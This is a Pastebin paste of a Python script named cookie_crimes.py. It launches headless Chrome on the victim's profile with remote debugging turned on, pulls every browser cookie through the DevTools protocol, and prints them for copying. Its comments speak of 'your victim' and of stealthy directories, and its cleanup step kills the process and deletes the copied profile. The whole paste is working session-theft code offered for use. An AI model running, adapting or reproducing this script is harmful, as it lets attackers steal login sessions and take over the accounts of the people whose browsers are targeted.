FlyFar

cookie_crimes.py

Jul 24th, 2023
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.25 KB | Cybersecurity | 0 0
  1. import os
  2. import shlex
  3. import shutil
  4. import signal
  5. import sys
  6. import time
  7.  
  8. import json
  9. import subprocess
  10.  
  11. import requests
  12. import websocket
  13.  
  14. def escape(s):
  15.     return s.replace(" ", "\ ")
  16.  
  17. # Edit this if you want to use a profile other than the default Chrome profile. Usually the profiles are called "Profile 1" etc. To list Chrome profiles, look in the Chrome User Data Directory for your OS.
  18. # If you don't know what this is, don't change it.
  19. PROFILE_NAME = "Default"
  20.  
  21. # Which localhost port should Chrome's remote debugging protocol listen on temporarily?
  22. REMOTE_DEBUGGING_PORT = 9222
  23.  
  24. # The words of the Ancient Language (Chrome DevTools Protocol) that summon the cookies if you dare utter them.
  25. GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Network.getAllCookies"})
  26.  
  27. # Os-specific Chrome flags
  28. os_flags = []
  29.  
  30. # Edit these if your victim has a wacky Chrome install.
  31. if sys.platform.startswith("linux"):
  32.     CHROME_CMD = "google-chrome"
  33.  
  34.     LINUX_CHROME_CMDS = ["/usr/bin/google-chrome-stable", "/usr/bin/google-chrome-beta", "/usr/bin/google-chrome"]
  35.     for cmd in LINUX_CHROME_CMDS:
  36.         if os.path.isfile(cmd):
  37.             CHROME_CMD = cmd
  38.             break
  39.  
  40.     USER_DATA_DIR = os.path.expanduser("~/.config/google-chrome/")
  41.  
  42. elif sys.platform.startswith("darwin"):
  43.     CHROME_CMD = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
  44.  
  45.     USER_DATA_DIR = os.path.expanduser("~/Library/Application Support/Google/Chrome")
  46.  
  47.     # macOS can't write crashdumps due to SIP sometimes, work around that by using a writeable dir.
  48.     # https://stackoverflow.com/questions/49103799/running-chrome-in-headless-mode
  49.     os_flags.append("--crash-dumps-dir=/tmp")
  50.  
  51. elif sys.platform.startswith("win"):
  52.     CHROME_CMD = "chrome.exe"
  53.     USER_DATA_DIR = r"%LOCALAPPDATA%\Google\Chrome\User Data"
  54.  
  55. else:
  56.     raise RuntimeError("um excuse me kind of OS is this? for real tho what is \"%s\"? y'know what i don't have to deal with this i'm outta here *car ignition noises* *driving noises* *driving noises fade away*" % sys.platform)
  57.  
  58. fake_user_data_dir = None
  59. if PROFILE_NAME != "Default":
  60.     # Sigh. Here we go.
  61.     # Move the relevant user data dir to somewhere and point Chrome there,
  62.     # since Chrome will always select the "Default" profile in a given directory,
  63.     # and all Chrome profiles are in the same User Data Directory by default.
  64.  
  65.     # it's a unix system. i know this.
  66.     if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
  67.  
  68.         # Replace "/tmp" with your own stealthy-but-writeable directory here.
  69.         # Or don't, I'm a comment not a cop.
  70.         tmpdir = "/tmp"
  71.         copy = ["cp", "-r"]
  72.  
  73.     elif sys.platform.startswith("win"):
  74.         tmpdir = "%TEMP%"
  75.         copy = ["xcopy", "/e", "/i", "/h"]
  76.     else:
  77.         raise RuntimeError("sweet merciful william gates, please no more of this '%s' OS. okay? i'm very disappointed." % sys.platform)
  78.  
  79.     profile_dir = os.path.join(USER_DATA_DIR, PROFILE_NAME)
  80.  
  81.     fake_user_data_dir = os.path.join(tmpdir, "chrome")
  82.  
  83.     if not os.path.exists(fake_user_data_dir):
  84.         os.mkdir(fake_user_data_dir)
  85.  
  86.     dest_dir = os.path.join(fake_user_data_dir, "Default")
  87.  
  88.     # Do CRAZY escaping because cp needs shell=True to read environment variables,
  89.     # which means we have to provide the exact command line.
  90.     if sys.platform.startswith("win"):
  91.         clean_profile_dir = '"%s"' % profile_dir
  92.         dest_dir = '"%s"' % dest_dir
  93.     else:
  94.         clean_profile_dir = escape(profile_dir)
  95.  
  96.     cmd = " ".join(
  97.             copy + [
  98.                 clean_profile_dir,
  99.                 dest_dir
  100.                 ]
  101.             )
  102.  
  103.     subprocess.Popen(cmd, shell=True)
  104.  
  105.     USER_DATA_DIR = fake_user_data_dir
  106.  
  107. chrome_args = [
  108.         "https://gmail.com", # Or any other URL
  109.         "--headless",
  110.         """--user-data-dir="{user_data_dir}" """.format(user_data_dir=USER_DATA_DIR),
  111.         "--remote-debugging-port={remote_debugging_port}".format(remote_debugging_port=REMOTE_DEBUGGING_PORT),
  112.         ]
  113.  
  114. CHROME_DEBUGGING_CMD = [escape(CHROME_CMD)] + chrome_args + os_flags
  115. CHROME_DEBUGGING_CMD = " ".join(CHROME_DEBUGGING_CMD)
  116.  
  117.  
  118. def summon_forbidden_protocol():
  119.     """IT COMES"""
  120.  
  121.     # Supress stdout and stderr from the Chrome process so it doesn't
  122.     # pollute our cookie output, for your copy/pasting convenience.
  123.     process = subprocess.Popen(CHROME_DEBUGGING_CMD,
  124.             shell=True,
  125.             stdout=subprocess.DEVNULL,
  126.             stderr=subprocess.DEVNULL)
  127.  
  128.     # Hey some people have slow computers, quite possibly because of
  129.     # all the malware you're running on them.
  130.     time.sleep(3)
  131.     return process
  132.  
  133. def hit_that_secret_json_path_like_its_1997():
  134.     response = requests.get("http://localhost:{port}/json".format(port=REMOTE_DEBUGGING_PORT))
  135.     websocket_url = response.json()[0].get("webSocketDebuggerUrl")
  136.     return websocket_url
  137.  
  138. def gimme_those_cookies(ws_url):
  139.     ws = websocket.create_connection(ws_url)
  140.     ws.send(GET_ALL_COOKIES_REQUEST)
  141.     result = ws.recv()
  142.     ws.close()
  143.  
  144.     # Parse out the actual cookie object from the debugging protocol object.
  145.     response = json.loads(result)
  146.     cookies = response["result"]["cookies"]
  147.  
  148.     return cookies
  149.  
  150. def cleanup(chrome_process):
  151.  
  152.     pid = chrome_process.pid
  153.     # Try and kill the first chrome process with a PID higher than ours.
  154.     if sys.platform.startswith("linux"):
  155.         for p in map(int, sorted(subprocess.check_output(["pidof", CHROME_CMD]).split())):
  156.             if p > chrome_process.pid:
  157.                 pid = p
  158.                 break
  159.             else:
  160.                 pid = chrome_process.pid + 1
  161.  
  162.     os.kill(pid, signal.SIGKILL)
  163.  
  164.     # If we copied a Profile's User Data Directory somewhere, clean it up.
  165.     if fake_user_data_dir is not None:
  166.         shutil.rmtree(fake_user_data_dir)
  167.  
  168. if __name__ == "__main__":
  169.     forbidden_process = summon_forbidden_protocol()
  170.     secret_websocket_debugging_url = hit_that_secret_json_path_like_its_1997()
  171.     cookies = gimme_those_cookies(secret_websocket_debugging_url)
  172.  
  173.     # Sleep for a sec so we don't get "Killed" in output.
  174.     time.sleep(1)
  175.  
  176.     cleanup(forbidden_process)
  177.  
  178.     print(json.dumps(cookies,indent=4, separators=(',', ': '), sort_keys=True))
Add Comment
Please, Sign In to add comment